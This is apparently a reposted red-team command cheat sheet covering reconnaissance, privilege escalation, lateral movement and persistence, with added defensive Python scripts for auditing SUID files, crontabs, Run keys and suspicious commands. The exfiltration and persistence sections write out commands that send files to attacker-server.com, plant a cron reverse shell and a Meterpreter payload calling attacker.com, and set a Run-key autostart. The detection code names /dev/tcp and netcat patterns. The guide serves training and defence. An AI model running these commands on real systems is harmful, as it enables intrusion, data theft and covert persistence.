
Introduction:
Penetration testing and red team operations require a deep arsenal of commands and techniques to assess security postures effectively. Mastering a core set of utilities across various platforms and domains is the difference between a successful engagement and a missed opportunity. This comprehensive guide consolidates the essential commands every security professional needs in their toolkit.
Learning Objectives:
- Acquire proficiency in fundamental reconnaissance and vulnerability scanning commands.
- Understand critical techniques for privilege escalation on both Windows and Linux systems.
- Learn essential commands for lateral movement, data exfiltration, and establishing persistence.
You Should Know:
1. Network Reconnaissance & Discovery
`nmap -sS -sV -O -p- 192.168.1.0/24`
This Nmap command performs a SYN stealth scan (-sS), service version detection (-sV), OS fingerprinting (-O), and scans all ports (-p-) against an entire subnet. It’s the gold standard for initial network enumeration, providing a complete picture of active hosts and their services.
`arp-scan --interface=eth0 --localnet`
Arp-scan broadcasts ARP requests on the specified interface to discover all live hosts on the local network, often revealing systems that ignore ICMP probes.
`dig AXFR @ns1.example.com example.com`
Attempts a DNS zone transfer from the specified nameserver. If the nameserver is misconfigured to allow transfers to arbitrary clients, this can reveal all DNS records for the domain, providing critical internal network information.
2. Web Application Vulnerability Assessment
`sqlmap -u "http://test.com/page.php?id=1" --batch --risk=3 --level=5`
Automates the process of detecting and exploiting SQL injection flaws. The `--batch` flag runs non-interactively, while `--risk` and `--level` control the depth of the tests.
`gobuster dir -u http://test.com/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt`
A fast directory and file brute-forcing tool. This command checks for common directories and files with common extensions, often uncovering hidden administrative interfaces or backup files.
`nikto -h http://test.com/ -C all`
A comprehensive web server scanner that checks for outdated server software, potentially dangerous files, and other common web vulnerabilities.
3. Linux Privilege Escalation
`sudo -l`
Lists the commands the current user is allowed to run with sudo. This is the first command to run when looking for privilege escalation vectors, as it may reveal a user can run a specific command as root without a password.
`find / -perm -4000 2>/dev/null`
Searches the entire filesystem for SUID binaries. These files execute with the permissions of their owner (often root), and some can be exploited to gain elevated privileges.
`uname -a; cat /etc/*-release; dpkg -l`
This series of commands gathers system information, including the kernel version, distribution details, and installed packages. This data is crucial for identifying potential kernel or software exploits.
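A defender's counterpart to the SUID search above, as an added example (not from the original post): compare the output of `find / -perm -4000` with a known-good baseline so that a newly added or relocated SUID binary stands out. The baseline allowlist and the sample `find` output are constructed.

```python
# Added example (not from the original post): compare `find / -perm -4000` output
# with a known-good SUID baseline. The baseline and sample output are constructed.
from dataclasses import dataclass

# Assumed allowlist of SUID paths expected on this host (e.g. from a golden image).
BASELINE_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/newgrp",
}
# Locations where a SUID binary is almost never legitimate.
HIGH_RISK_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# Constructed sample of what `find / -perm -4000 2>/dev/null` might print.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/newgrp
/usr/local/bin/backup_helper
/tmp/.x/bash
"""

@dataclass(frozen=True)
class Finding:
    path: str
    severity: str  # "high": lives in a risky location; "medium": merely unexpected

def audit_suid(find_output: str, baseline: set = BASELINE_SUID) -> list:
    """SUID binaries absent from the baseline, high severity first."""
    findings = []
    for raw in find_output.splitlines():
        path = raw.strip()
        if not path or path in baseline:
            continue
        risky = path.startswith(HIGH_RISK_PREFIXES)
        findings.append(Finding(path, "high" if risky else "medium"))
    # False sorts before True, so "high" findings come first.
    return sorted(findings, key=lambda f: (f.severity != "high", f.path))

def missing_from_baseline(find_output: str, baseline: set = BASELINE_SUID) -> set:
    """Baseline entries no longer SUID (binary replaced, stripped or removed)."""
    present = {line.strip() for line in find_output.splitlines() if line.strip()}
    return baseline - present

if __name__ == "__main__":
    for f in audit_suid(SAMPLE_FIND_OUTPUT):
        print(f"[{f.severity.upper()}] unexpected SUID binary: {f.path}")
```

Feed it the saved output of the `find` command from a golden image as the baseline and from the live host as the input; anything that appears only on the live host is the review queue.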
4. Windows Privilege Escalation
`whoami /priv`
Displays the privileges assigned to the current user token. Enabled privileges like `SeImpersonatePrivilege` or `SeBackupPrivilege` can often be leveraged for elevation.
`systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"`
Outputs key OS information needed to research relevant kernel exploits, ensuring you use the correct exploit for the architecture and version.
`wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"`
Queries for services that start automatically and whose executable path is not within the default Windows directory. Unquoted service paths or writable service binaries are common escalation vectors.
5. Lateral Movement & Pivoting
`psexec.py domain/user:password@targetIP`
From the Impacket suite, this tool executes a remote command on a Windows target using SMB, often used to get a shell on a remote system if credentials are known.
`evil-winrm -i targetIP -u username -p password`
Connects to a remote Windows host using the WinRM service, which is a legitimate administrative tool that can be used for lateral movement.
`ssh -D 1080 [email protected]`
Establishes a dynamic SOCKS proxy through an SSH connection to a compromised jump host. This allows you to route your tools’ traffic through the pivot point to access internal networks.
6. Data Exfiltration & Command Control
`scp /local/path/sensitive.txt [email protected]:/remote/path/`
Securely copies (via SSH) a file from the compromised host to an attacker-controlled server. This is a straightforward method for exfiltrating data.
`python3 -m http.server 8000`
Starts a simple HTTP server on port 8000. This can be used to host tools for download on the target machine or to exfiltrate data via `curl` or `wget` POST requests.
`curl -X POST -F '[email protected]' http://attacker-server.com/upload`
Uses `curl` to send a file via a POST request to a remote web server, a common method for exfiltrating data through web protocols which may be less monitored.
7. Establishing Persistence
`crontab -l > /tmp/backup_cron; echo "* * * * * /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1" >> /tmp/backup_cron; crontab /tmp/backup_cron`
This series of commands backs up the current crontab, appends a new job that creates a reverse shell every minute, and reinstalls the modified crontab.
`msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > payload.exe`
Generates a Meterpreter payload in an executable format. This payload can be deployed on the target to establish a feature-rich, persistent reverse shell.
`reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "BackupService" /t REG_SZ /d "C:\Windows\Temp\payload.exe"`
Adds a registry key that will cause the `payload.exe` to execute automatically whenever a user logs in, a classic persistence mechanism on Windows.
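The two persistence artefacts above are exactly what a host audit should look for. The following added example (not from the original post) scans a crontab dump for cron jobs that spawn a network callback and a `reg query` listing of the Run key for payloads living outside program directories. The indicator lists, the sample crontab and the sample `reg query` output are constructed.

```python
# Added example (not from the original post): flag the persistence artefacts
# described above in a crontab dump and a Windows Run-key listing. The sample
# crontab and `reg query` output are constructed.
import re

# Patterns typical of a shell callback planted in a cron job.
CRON_INDICATORS = [
    (r"/dev/tcp/", "bash network redirection"),
    (r"\bbash\s+-i\b", "interactive shell from cron"),
    (r"\bnc\b.*\s-e\b|\bncat\b.*--exec", "netcat exec"),
    (r"base64\s+(-d|--decode)", "inline base64 decoding"),
]
# Run-key payloads living outside program directories are a classic red flag.
SUSPICIOUS_RUN_DIRS = (r"c:\windows\temp", r"c:\users\public",
                       r"\appdata\local\temp", r"c:\programdata")

def scan_crontab(text: str) -> list:
    """Return (cron line, reason) for non-comment entries matching an indicator."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        for pattern, reason in CRON_INDICATORS:
            if re.search(pattern, line):
                hits.append((line.strip(), reason))
                break
    return hits

def scan_run_keys(reg_output: str) -> list:
    """Return (value name, data) for Run-key entries pointing into risky directories."""
    hits = []
    # `reg query` prints one value per line:  <name>  REG_SZ|REG_EXPAND_SZ  <data>
    for m in re.finditer(r"^\s*(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$", reg_output, re.M):
        name, data = m.group(1), m.group(2)
        if any(d in data.lower() for d in SUSPICIOUS_RUN_DIRS):
            hits.append((name, data))
    return hits

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /bin/bash -i >& /dev/tcp/203.0.113.10/4444 0>&1
"""
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    BackupService     REG_SZ           C:\Windows\Temp\payload.exe
"""
```

Run `scan_crontab` over `crontab -l` output for every account (not just root) and `scan_run_keys` over both the HKLM and HKCU Run keys; the value name alone proves nothing, since an attacker picks a plausible one as the page shows.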
What Undercode Say:
- The modern red teamer’s effectiveness is directly proportional to their command-line fluency and their ability to chain these discrete techniques into a coherent attack path.
- Defensive strategies must evolve beyond signature-based detection to behavioral analysis, as many of these commands are legitimate system administration tools.
The core challenge in modern security is the dual-use nature of these powerful commands. Tools like `PsExec` and `SCP` are essential for IT administration but are also primary attack vectors. This reality necessitates a security model focused on user and entity behavior analytics (UEBA) rather than simply blocking tools. Effective blue teams must not only recognize these commands but also understand the context in which they are run—a `whoami /priv` command is normal for a sysadmin troubleshooting an issue but is a massive red flag when run by a user from the marketing department. The future of defense lies in this contextual awareness.
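The contextual rule stated above can be written down as scoring logic. The following added example (not from the original post) triages process-creation events by who ran a recon command and how many ran in a short window: the same `whoami /priv` scores low for an administrator and high for a marketing account, and a burst of such commands doubles the score. The role map, the recon command list and the sample events are constructed; in practice the role would come from directory group membership.

```python
# Added example (not from the original post): context-aware triage of process
# creation events. The role map and the events below are constructed; in practice
# the role would come from AD group membership or an HR feed.
from collections import defaultdict
from datetime import datetime, timedelta

# Commands from the sections above that are routine for admins but rare elsewhere.
RECON_COMMANDS = ("whoami /priv", "systeminfo", "sudo -l", "wmic service get",
                  "find / -perm -4000", "net user", "psexec")
# Assumed directory of who is expected to run such commands.
USER_ROLES = {"alice": "IT-Admins", "bob": "Marketing", "svc-backup": "Service"}

def classify(event: dict) -> tuple:
    """Score one event {ts, user, host, cmd}: (verdict, points)."""
    cmd = event["cmd"].lower()
    if not any(c in cmd for c in RECON_COMMANDS):
        return ("ignore", 0)
    role = USER_ROLES.get(event["user"], "Unknown")
    if role == "IT-Admins":
        return ("expected", 1)   # keep for audit, no alert
    return ("suspicious", 5)     # recon from a non-admin account

def triage(events: list, window: timedelta = timedelta(minutes=10)) -> dict:
    """Per-user total; three or more recon commands inside `window` doubles it."""
    per_user = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        verdict, points = classify(e)
        if verdict != "ignore":
            per_user[e["user"]].append((e["ts"], points))
    totals = {}
    for user, hits in per_user.items():
        total = sum(p for _, p in hits)
        burst = len(hits) >= 3 and hits[-1][0] - hits[0][0] <= window
        totals[user] = total * 2 if burst else total
    return totals

T0 = datetime(2024, 5, 1, 9, 0)
SAMPLE_EVENTS = [  # constructed
    {"ts": T0, "user": "alice", "host": "ws-it-01", "cmd": "whoami /priv"},
    {"ts": T0 + timedelta(minutes=1), "user": "bob", "host": "ws-mkt-07", "cmd": "whoami /priv"},
    {"ts": T0 + timedelta(minutes=2), "user": "bob", "host": "ws-mkt-07", "cmd": "systeminfo"},
    {"ts": T0 + timedelta(minutes=3), "user": "bob", "host": "ws-mkt-07", "cmd": "net user /domain"},
    {"ts": T0 + timedelta(minutes=4), "user": "bob", "host": "ws-mkt-07", "cmd": "outlook.exe"},
]

if __name__ == "__main__":
    for user, score in sorted(triage(SAMPLE_EVENTS).items(), key=lambda kv: -kv[1]):
        print(f"{user:12} score={score:3} role={USER_ROLES.get(user, 'Unknown')}")
```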
Prediction:
The increasing adoption of EDR (Endpoint Detection and Response) solutions and sophisticated SIEM rules will force red team methodologies to evolve. We will see a significant shift towards “living off the land” using interpreted languages like Python and PowerShell, which are harder to distinguish from legitimate activity. Furthermore, the use of AI by defensive systems to detect anomalous command sequences will lead to the development of AI-powered offensive tools that can dynamically generate “low-and-slow” attack commands designed to mimic baseline traffic, escalating the cyber arms race to a new, algorithmic level.
Reported By: Jawadabdulsamad Your – Hackers Feeds